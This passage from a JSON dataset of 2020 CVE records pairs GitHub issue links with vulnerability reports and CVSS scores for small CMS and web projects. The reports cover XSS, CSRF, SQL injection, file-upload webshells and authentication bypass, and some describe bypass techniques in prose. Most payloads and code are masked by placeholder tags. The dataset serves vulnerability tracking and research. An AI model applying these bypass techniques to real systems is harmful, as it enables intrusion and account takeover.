  55852. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/32",
  55853. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/32",
  55854. "Repo_new": "nangge/nonecms",
  55855. "Issue_Created_At": "2020-06-03T02:42:24Z",
  55856. "description": "APITAG NUMBERTAG has an XSS vulnerability. Cross site scripting (XSS) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote authenticated attackers to inject arbitrary web script or HTML via the name parameter. By default, APITAG uses FILETAG for users to edit their articles. However, FILETAG has an XSS vulnerability. A remote user who has the right to edit articles can inject arbitrary web script or HTML in PATHTAG APITAG ERRORTAG APITAG FILETAG",
  55857. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55858. "severity": "MEDIUM",
  55859. "baseScore": 5.4,
  55860. "impactScore": 2.7,
  55861. "exploitabilityScore": 2.3
  55862. },
  55863. {
  55864. "CVE_ID": "CVE-2020-23376",
  55865. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/35",
  55866. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/35",
  55867. "Repo_new": "nangge/nonecms",
  55868. "Issue_Created_At": "2020-06-04T12:01:26Z",
  55869. "description": "APITAG NUMBERTAG has a CSRF vulnerability in PATHTAG APITAG NUMBERTAG has a CSRF vulnerability in PATHTAG as demonstrated by adding a navigation column which can be injected arbitrary web script or HTML via the name parameter to launch a stored XSS attack. Vulnerability code is located in PATHTAG ERRORTAG No CSRF token here. We can also use APITAG as proxy to see that the PATHTAG API doesn't use csrf token: FILETAG When the administrator visits the malicious link, the page will automatically click to trigger the CSRF attack: FILETAG When back end administrator accesses the background or the front end user accesses the column, it will trigger xss attack: FILETAG",
  55870. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55871. "severity": "MEDIUM",
  55872. "baseScore": 6.1,
  55873. "impactScore": 2.7,
  55874. "exploitabilityScore": 2.8
  55875. },
  55876. {
  55877. "CVE_ID": "CVE-2020-23447",
  55878. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/33",
  55879. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/33",
  55880. "Repo_new": "newbee-ltd/newbee-mall",
  55881. "Issue_Created_At": "2020-05-27T01:07:36Z",
  55882. "description": "There is xss in the front desk which can get hazards such as administrator cookies. APITAG an environment to simulate users selecting products at the front desk\u2014\u2014add to cart\u2014\u2014confirm order pay\uff1a URLTAG Insert the payload here at the harvest information: APITAG alert APITAG APITAG FILETAG APITAG the administrator logs in to the background, XSS will be triggered when viewing the APITAG Recipient Information\" of this order in the APITAG Management Office\" FILETAG",
  55883. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55884. "severity": "MEDIUM",
  55885. "baseScore": 6.1,
  55886. "impactScore": 2.7,
  55887. "exploitabilityScore": 2.8
  55888. },
  55889. {
  55890. "CVE_ID": "CVE-2020-23448",
  55891. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/34",
  55892. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/34",
  55893. "Repo_new": "newbee-ltd/newbee-mall",
  55894. "Issue_Created_At": "2020-05-27T02:40:23Z",
  55895. "description": "System background authentication can be bypassed. APITAG authentication logic of the system's background /admin is in code APITAG FILETAG APITAG can easily be bypassed, like request //admin NUMBERTAG We delete the requested cookie field and then request /admin,returns NUMBERTAG FILETAG APITAG if we request //admin\uff0cWe can perform administrator actions without logging in\uff0c For example, upload a babat file\uff1a FILETAG It can execute any server command\uff0csuch as calc\uff1a FILETAG",
  55896. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55897. "severity": "CRITICAL",
  55898. "baseScore": 9.8,
  55899. "impactScore": 5.9,
  55900. "exploitabilityScore": 3.9
  55901. },
  55902. {
  55903. "CVE_ID": "CVE-2020-23449",
  55904. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/35",
  55905. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/35",
  55906. "Repo_new": "newbee-ltd/newbee-mall",
  55907. "Issue_Created_At": "2020-05-27T03:35:28Z",
  55908. "description": "IDOR causes unauthorized changes to any user information. PATHTAG interface can be used to update user information\uff1a FILETAG APITAG corresponding code is as follows\uff1a FILETAG Track APITAG method\uff1a FILETAG APITAG code updates the information after querying by the value of userid, so you can modify any user information by tampering with the value of APITAG",
  55909. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  55910. "severity": "HIGH",
  55911. "baseScore": 7.5,
  55912. "impactScore": 3.6,
  55913. "exploitabilityScore": 3.9
  55914. },
  55915. {
  55916. "CVE_ID": "CVE-2020-23469",
  55917. "Issue_Url_old": "https://github.com/gmate/gmate/issues/191",
  55918. "Issue_Url_new": "https://github.com/gmate/gmate/issues/191",
  55919. "Repo_new": "gmate/gmate",
  55920. "Issue_Created_At": "2020-05-29T11:36:15Z",
  55921. "description": "Regular Expression APITAG vulnerability in the gedit3 plugin. Regular Expression APITAG vulnerability in the gedit3 plugin We are working on the APITAG URLTAG problem and detected two vulnerable regexes from your gedit3 plugin code. Vulnerable rege NUMBERTAG APITAG in FILETAG It takes forever for the regex to match the string APITAG We suggest you change the structure APITAG , since \".\" can accept \"<\" and \">\". Vulnerable rege NUMBERTAG FILETAG and FILETAG This vulnerability can be triggered by CODETAG Both APITAG and APITAG can match APITAG , we suggest you to change APITAG since this branch is mainly included in APITAG . We didn\u2019t create a pull request because we're not sure if these cases are possible to take place in your program, we also do not understand the functionality of these regexes as you do. Thank you for your understanding.",
  55922. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55923. "severity": "HIGH",
  55924. "baseScore": 7.5,
  55925. "impactScore": 3.6,
  55926. "exploitabilityScore": 3.9
  55927. },
  55928. {
  55929. "CVE_ID": "CVE-2020-23478",
  55930. "Issue_Url_old": "https://github.com/leo-editor/leo-editor/issues/1597",
  55931. "Issue_Url_new": "https://github.com/leo-editor/leo-editor/issues/1597",
  55932. "Repo_new": "leo-editor/leo-editor",
  55933. "Issue_Created_At": "2020-05-29T14:08:29Z",
  55934. "description": "Regular Expression APITAG vulnerabilities in PATHTAG We are working on the APITAG URLTAG problem and detected a vulnerable regex from your code. APITAG in FILETAG takes forever to match the string APITAG We suggest you change the structure APITAG , to APITAG . We didn\u2019t create a pull request because we're not sure if this case is possible to take place in your program, we also do not understand the functionality of the regex as you do. Thank you for your understanding.",
  55935. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55936. "severity": "HIGH",
  55937. "baseScore": 7.5,
  55938. "impactScore": 3.6,
  55939. "exploitabilityScore": 3.9
  55940. },
  55941. {
  55942. "CVE_ID": "CVE-2020-23489",
  55943. "Issue_Url_old": "https://github.com/WWBN/AVideo/issues/3117",
  55944. "Issue_Url_new": "https://github.com/wwbn/avideo/issues/3117",
  55945. "Repo_new": "wwbn/avideo",
  55946. "Issue_Created_At": "2020-05-22T09:16:47Z",
  55947. "description": "[URGENT] Serious security issues . Heya, I found NUMBERTAG high critical security issues: User with low privilege can take over the website Local File Include that exposes server files with DB credentials. Where I can report them? posting them here may lead to disaster for users. Best",
  55948. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  55949. "severity": "HIGH",
  55950. "baseScore": 8.8,
  55951. "impactScore": 5.9,
  55952. "exploitabilityScore": 2.8
  55953. },
  55954. {
  55955. "CVE_ID": "CVE-2020-23520",
  55956. "Issue_Url_old": "https://github.com/peacexie/imcat/issues/4",
  55957. "Issue_Url_new": "https://github.com/peacexie/imcat/issues/4",
  55958. "Repo_new": "peacexie/imcat",
  55959. "Issue_Created_At": "2020-06-02T07:09:43Z",
  55960. "description": "File Upload. Describe the bug Upload php files to control the target server Exploit vulnerability \uff1a Upload malicious PHP file here: PATHTAG pyload NUMBERTAG php+ FILETAG : APITAG NUMBERTAG before modification\uff1a FILETAG after modification\uff1a FILETAG connect PHP file: PATHTAG FILETAG FILETAG The Vuln src code: PATHTAG > APITAG > APITAG APITAG can not match .php+ PATHTAG > APITAG > APITAG , because APITAG is only used for checking filename whether or not have jpg. \uff0cso we can upload NUMBERTAG php+ .jpg to bypass filtering. FILETAG FILETAG",
  55961. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  55962. "severity": "HIGH",
  55963. "baseScore": 7.2,
  55964. "impactScore": 5.9,
  55965. "exploitabilityScore": 1.2
  55966. },
  55967. {
  55968. "CVE_ID": "CVE-2020-23522",
  55969. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/20",
  55970. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/20",
  55971. "Repo_new": "pixelimity/pixelimity",
  55972. "Issue_Created_At": "2020-06-02T17:11:23Z",
  55973. "description": "CSRF Vulnerability NUMBERTAG Affected software: Pixelimity CMS Type of vulnerability: CSRF APITAG Site Request Forgery) Discovered by: Noth Author: Noth Description: Pixelimity CMS is vulnerable to persistent Cross Site Request Forgery attacks, which allow malicious users to inject HTML or scripts and forge user permissions to operate. Vulnerable URL: FILETAG Vulnerable parameter: password Proof of Concept NUMBERTAG Login as admin. FILETAG NUMBERTAG Locate URL FILETAG FILETAG NUMBERTAG Use Burpsuite to intercept packets FILETAG Original password NUMBERTAG Payload : FILETAG Later password NUMBERTAG The password can be changed successfully! Test Video :",
  55974. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  55975. "severity": "MEDIUM",
  55976. "baseScore": 6.8,
  55977. "impactScore": 5.9,
  55978. "exploitabilityScore": 0.9
  55979. },
  55980. {
  55981. "CVE_ID": "CVE-2020-23534",
  55982. "Issue_Url_old": "https://github.com/gopeak/masterlab/issues/254",
  55983. "Issue_Url_new": "https://github.com/gopeak/masterlab/issues/254",
  55984. "Repo_new": "gopeak/masterlab",
  55985. "Issue_Created_At": "2020-06-04T13:00:59Z",
  55986. "description": "SSRF exists in the background. \u8fd9\u91cc\u8f93\u5165\u5bf9bug\u505a\u51fa\u6e05\u6670\u7b80\u6d01\u7684\u63cf\u8ff0. Vulnerability file PATHTAG FILETAG POC: URLTAG FILETAG NUMBERTAG",
  55987. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55988. "severity": "CRITICAL",
  55989. "baseScore": 9.8,
  55990. "impactScore": 5.9,
  55991. "exploitabilityScore": 3.9
  55992. },
  55993. {
  55994. "CVE_ID": "CVE-2020-23572",
  55995. "Issue_Url_old": "https://github.com/source-trace/beescms/issues/6",
  55996. "Issue_Url_new": "https://github.com/source-trace/beescms/issues/6",
  55997. "Repo_new": "source-trace/beescms",
  55998. "Issue_Created_At": "2020-06-08T06:58:15Z",
  55999. "description": "There is a file upload vulnerability so that the webshell can be obtained. Let's take a look at the code FILETAG Because the system does not strictly filter and restrict the pictures uploaded by users, resulting in file upload vulnerabilities. From the code, it can be seen that only the size of the picture and the Content Type and so on are verified during the upload, so only need to modify the Content Type to bypass Upload. After the administrator logged in, open the following one page. FILETAG Upload FILETAG and grab the package to modify the Content Type to \"image/jpg\" FILETAG Then we can see that FILETAG was successfully uploaded. Then we access the uploaded file FILETAG",
  56000. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56001. "severity": "HIGH",
  56002. "baseScore": 8.8,
  56003. "impactScore": 5.9,
  56004. "exploitabilityScore": 2.8
  56005. },
  56006. {
  56007. "CVE_ID": "CVE-2020-23580",
  56008. "Issue_Url_old": "https://github.com/DengyigeFeng/vuln/issues/1",
  56009. "Issue_Url_new": "https://github.com/dengyigefeng/vuln/issues/1",
  56010. "Repo_new": "dengyigefeng/vuln",
  56011. "Issue_Created_At": "2020-06-09T12:46:28Z",
  56012. "description": "APITAG NUMBERTAG remote code execution. poc\uff1a CODETAG detail NUMBERTAG Submit poc on the message board FILETAG APITAG background administrator set to display the message The default user name of the background administrator is admin, and the default password is NUMBERTAG isit FILETAG , set to display the message FILETAG APITAG code will be executed when you visit the message board page again FILETAG",
  56013. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56014. "severity": "CRITICAL",
  56015. "baseScore": 9.8,
  56016. "impactScore": 5.9,
  56017. "exploitabilityScore": 3.9
  56018. },
  56019. {
  56020. "CVE_ID": "CVE-2020-23630",
  56021. "Issue_Url_old": "https://github.com/Pandora1m2/zzcms201910/issues/1",
  56022. "Issue_Url_new": "https://github.com/pandora1m2/zzcms201910/issues/1",
  56023. "Repo_new": "pandora1m2/zzcms201910",
  56024. "Issue_Created_At": "2020-06-12T11:16:02Z",
  56025. "description": "APITAG Blind SQL injection vulnerability based on time. Software download address\uff1a FILETAG Operation environment requirements\uff1a Apache, IIS, etc PHP4 / PHP5 / PHP7 APITAG NUMBERTAG Here is a global filter at FILETAG ERRORTAG At first, you need to register an enterprise account at the website, /reg/userreg.htm Then, log in at FILETAG and jump to FILETAG APITAG APITAG FILETAG : APITAG CODETAG Function APITAG at APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG this Function filters \"'\", \" , \"/\", \"<\", \">\", \"select\", check.php calls this Function but forgets the parameter \u201cpassword\u201d in the cookies at line APITAG so we can perform SQL injection via cookies Poc: Just log in and modify the value of the cookie, then refresh (F5). APITAG APITAG APITAG",
  56026. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  56027. "severity": "HIGH",
  56028. "baseScore": 8.8,
  56029. "impactScore": 5.9,
  56030. "exploitabilityScore": 2.8
  56031. },
  56032. {
  56033. "CVE_ID": "CVE-2020-23631",
  56034. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/11",
  56035. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/11",
  56036. "Repo_new": "shadoweb/wdja",
  56037. "Issue_Created_At": "2020-06-12T14:12:55Z",
  56038. "description": "csrf&xss can get users cookie or other information \u2014\u2014 csrf+xss \u7ed3\u5408\u6f0f\u6d1e\u83b7\u53d6\u7528\u6237cookie\u4fe1\u606f. FILETAG exists Csrf Vulnerability. And we can write exp like this to trigger an xss. CSRF EXP\uff1a CODETAG FILETAG FILETAG \u5b58\u5728csrf\u8fd9\u4e2a\u90fd\u63d0\u8fc7\u4e86\uff0c\u901a\u8fc7\u914d\u5408\u53ef\u4ee5\u5b9e\u73b0\u8fd9\u6837\u7684\u653b\u51fb\u65b9\u5f0f\uff1a \u5168\u7ad9\u914d\u7f6e \u300b\u7edf\u8ba1\u4ee3\u7801 \u300b\u5b58\u5728xss\u653b\u51fb version / \u590d\u73b0\u73af\u5883\uff1a APITAG APITAG php NUMBERTAG",
  56039. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56040. "severity": "MEDIUM",
  56041. "baseScore": 6.1,
  56042. "impactScore": 2.7,
  56043. "exploitabilityScore": 2.8
  56044. },
  56045. {
  56046. "CVE_ID": "CVE-2020-23643",
  56047. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/29",
  56048. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/29",
  56049. "Repo_new": "cherry-toto/jizhicms",
  56050. "Issue_Created_At": "2020-06-15T14:56:07Z",
  56051. "description": "XSS vulnerability jizhicms NUMBERTAG Wechat reflected xss vulnerability. A xss vulnerability was discovered in jizhicms NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of PATHTAG Vulnerability file: APITAG ERRORTAG ERRORTAG APITAG APITAG FILETAG",
  56052. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56053. "severity": "MEDIUM",
  56054. "baseScore": 6.1,
  56055. "impactScore": 2.7,
  56056. "exploitabilityScore": 2.8
  56057. },
  56058. {
  56059. "CVE_ID": "CVE-2020-23644",
  56060. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/28",
  56061. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/28",
  56062. "Repo_new": "cherry-toto/jizhicms",
  56063. "Issue_Created_At": "2020-06-15T14:40:14Z",
  56064. "description": "XSS vulnerability. A xss vulnerability was discovered in jizhicms NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of ERRORTAG Vulnerability file: ERRORTAG ERRORTAG APITAG ERRORTAG FILETAG",
  56065. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56066. "severity": "MEDIUM",
  56067. "baseScore": 6.1,
  56068. "impactScore": 2.7,
  56069. "exploitabilityScore": 2.8
  56070. },
  56071. {
  56072. "CVE_ID": "CVE-2020-23653",
  56073. "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/238",
  56074. "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/238",
  56075. "Repo_new": "zoujingli/thinkadmin",
  56076. "Issue_Created_At": "2020-06-02T02:38:06Z",
  56077. "description": "Remote code execution vulnerability. Hi, this is Tencent Xcheck team. Our code safety check tool Xcheck has found several unserialize vulnerabilities in this project NUMBERTAG It leads to remote code execution. Here are the details NUMBERTAG PATHTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG NUMBERTAG PATHTAG line NUMBERTAG ERRORTAG Prevent from abusing of this vulnerability, we don't provide proof of concept. We hope to repair it as soon as possible. From Xcheck Team",
  56078. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56079. "severity": "CRITICAL",
  56080. "baseScore": 9.8,
  56081. "impactScore": 5.9,
  56082. "exploitabilityScore": 3.9
  56083. },
  56084. {
  56085. "CVE_ID": "CVE-2020-23654",
  56086. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/10",
  56087. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/10",
  56088. "Repo_new": "navigatecms/navigate-cms",
  56089. "Issue_Created_At": "2020-06-17T14:24:49Z",
  56090. "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG Describe the bug / An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate / To Reproduce / Steps to reproduce the behavior: / Login into the panel NUMBERTAG Go to APITAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! / Expected behavior / The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page / Impact / Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. / Screenshots / Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: \"Go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG / Desktop (please complete the following information): / OS: Windows Browser: All _I Hope you fix it ASAP_",
  56091. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56092. "severity": "MEDIUM",
  56093. "baseScore": 5.4,
  56094. "impactScore": 2.7,
  56095. "exploitabilityScore": 2.3
  56096. },
  56097. {
  56098. "CVE_ID": "CVE-2020-23655",
  56099. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/11",
  56100. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/11",
  56101. "Repo_new": "navigatecms/navigate-cms",
  56102. "Issue_Created_At": "2020-06-17T14:57:52Z",
  56103. "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG APITAG the bug/ An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate /To Reproduce/ Steps to reproduce the behavior: APITAG into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. APITAG Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All I Hope you fix it ASAP",
  56104. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56105. "severity": "MEDIUM",
  56106. "baseScore": 5.4,
  56107. "impactScore": 2.7,
  56108. "exploitabilityScore": 2.3
  56109. },
  56110. {
  56111. "CVE_ID": "CVE-2020-23656",
  56112. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/12",
  56113. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/12",
  56114. "Repo_new": "navigatecms/navigate-cms",
  56115. "Issue_Created_At": "2020-06-17T15:28:13Z",
  56116. "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG APITAG the bug/ An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate /To Reproduce/ Steps to reproduce the behavior: APITAG into the panel NUMBERTAG Go to APITAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. APITAG Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All _I Hope you fix it ASAP_",
  56117. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56118. "severity": "MEDIUM",
  56119. "baseScore": 5.4,
  56120. "impactScore": 2.7,
  56121. "exploitabilityScore": 2.3
  56122. },
  56123. {
  56124. "CVE_ID": "CVE-2020-23658",
  56125. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2325",
  56126. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2325",
  56127. "Repo_new": "php-fusion/PHP-Fusion",
  56128. "Issue_Created_At": "2020-05-15T18:16:09Z",
  56129. "description": "Cloudflare XSS Bypass Cross Site Scripting Vulnerability in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability NUMBERTAG In Content Admin: Poll, Blog, ... etc NUMBERTAG In System Admin: Banner NUMBERTAG In Setting: Main To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Panel NUMBERTAG Insert Payload Example NUMBERTAG a. Go to PATHTAG b. Click add Poll c. Insert Payload: APITAG X APITAG d. Save Poll: XSS alert Message! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots Info PHP Fusion in Update: FILETAG E NUMBERTAG Pools FILETAG FILETAG E NUMBERTAG Blogs FILETAG FILETAG E NUMBERTAG Banner FILETAG FILETAG E NUMBERTAG Main Settings FILETAG FILETAG Desktop (please complete the following information): OS: [e.g. iOS] Browser [e.g. chrome, safari] Version [e.g NUMBERTAG Smartphone (please complete the following information): OS: Windows Browser All Version",
  56130. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56131. "severity": "MEDIUM",
  56132. "baseScore": 5.4,
  56133. "impactScore": 2.7,
  56134. "exploitabilityScore": 2.3
  56135. },
  56136. {
  56137. "CVE_ID": "CVE-2020-23659",
  56138. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/1",
  56139. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/1",
  56140. "Repo_new": "r0ck3t1973/xss_payload",
  56141. "Issue_Created_At": "2020-06-23T03:11:09Z",
  56142. "description": "Cross Site Script Vulnerability on \"connections\" in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"connections\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Change connections NUMBERTAG Insert Payload: '> APITAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Info APITAG NUMBERTAG FILETAG NUMBERTAG Insert payload FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser Chrome Version: Version NUMBERTAG",
  56143. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56144. "severity": "MEDIUM",
  56145. "baseScore": 5.4,
  56146. "impactScore": 2.7,
  56147. "exploitabilityScore": 2.3
  56148. },
  56149. {
  56150. "CVE_ID": "CVE-2020-23680",
  56151. "Issue_Url_old": "https://github.com/philips/text2pdf/issues/1",
  56152. "Issue_Url_new": "https://github.com/philips/text2pdf/issues/1",
  56153. "Repo_new": "philips/text2pdf",
  56154. "Issue_Created_At": "2020-06-20T14:10:37Z",
  56155. "description": "Array out of bounds. In the text2pdf.c file, the function APITAG does not check the maximum value of the parameter when operating on the array locations when can see the maximum value of the parameter should less than NUMBERTAG but we got NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  56156. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56157. "severity": "HIGH",
  56158. "baseScore": 7.8,
  56159. "impactScore": 5.9,
  56160. "exploitabilityScore": 1.8
  56161. },
  56162. {
  56163. "CVE_ID": "CVE-2020-23685",
  56164. "Issue_Url_old": "https://github.com/vtime-tech/188Jianzhan/issues/2",
  56165. "Issue_Url_new": "https://github.com/vtime-tech/188jianzhan/issues/2",
  56166. "Repo_new": "vtime-tech/188jianzhan",
  56167. "Issue_Created_At": "2020-06-21T09:29:24Z",
  56168. "description": "NUMBERTAG jianzhan NUMBERTAG FILETAG sql injection vulnerability. There is SQL injection vulnerability in the login office of APITAG which can bypass WAF and direct universal password without the need to verify the login background. FILETAG At line NUMBERTAG querying $user and $PWD using the SELECT statement does not do any effective filtering. So there is an SQL injection vulnerability and you can log in directly with the universal password APITAG But first, we need to bypass APITAG a NUMBERTAG waf protection. FILETAG We can use like instead of APITAG In the APITAG payload : APITAG APITAG enter any password\u3002 FILETAG",
  56169. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56170. "severity": "CRITICAL",
  56171. "baseScore": 9.8,
  56172. "impactScore": 5.9,
  56173. "exploitabilityScore": 3.9
  56174. },
  56175. {
  56176. "CVE_ID": "CVE-2020-23686",
  56177. "Issue_Url_old": "https://github.com/loadream/AyaCMS/issues/1",
  56178. "Issue_Url_new": "https://github.com/loadream/ayacms/issues/1",
  56179. "Repo_new": "loadream/ayacms",
  56180. "Issue_Created_At": "2020-06-21T14:04:19Z",
  56181. "description": "There is one CSRF vulnerability that can Change administrator password\u3002. After the administrator logged in, open the following page poc\uff1a APITAG Change administrator password CODETAG You can successfully change the administrator password to NUMBERTAG",
  56182. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56183. "severity": "HIGH",
  56184. "baseScore": 8.8,
  56185. "impactScore": 5.9,
  56186. "exploitabilityScore": 2.8
  56187. },
  56188. {
  56189. "CVE_ID": "CVE-2020-23689",
  56190. "Issue_Url_old": "https://github.com/lxw1844912514/YFCMF/issues/2",
  56191. "Issue_Url_new": "https://github.com/lxw1844912514/yfcmf/issues/2",
  56192. "Repo_new": "lxw1844912514/yfcmf",
  56193. "Issue_Created_At": "2020-06-21T14:16:08Z",
  56194. "description": "YFCMF NUMBERTAG has a storage xss vulnerability. First log in as an administrator\uff0cthen find an article on the news page example\uff1a FILETAG FILETAG Then leave a message and enter the APITAG APITAG FILETAG FILETAG View in the background of the website FILETAG",
  56195. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  56196. "severity": "MEDIUM",
  56197. "baseScore": 4.8,
  56198. "impactScore": 2.7,
  56199. "exploitabilityScore": 1.7
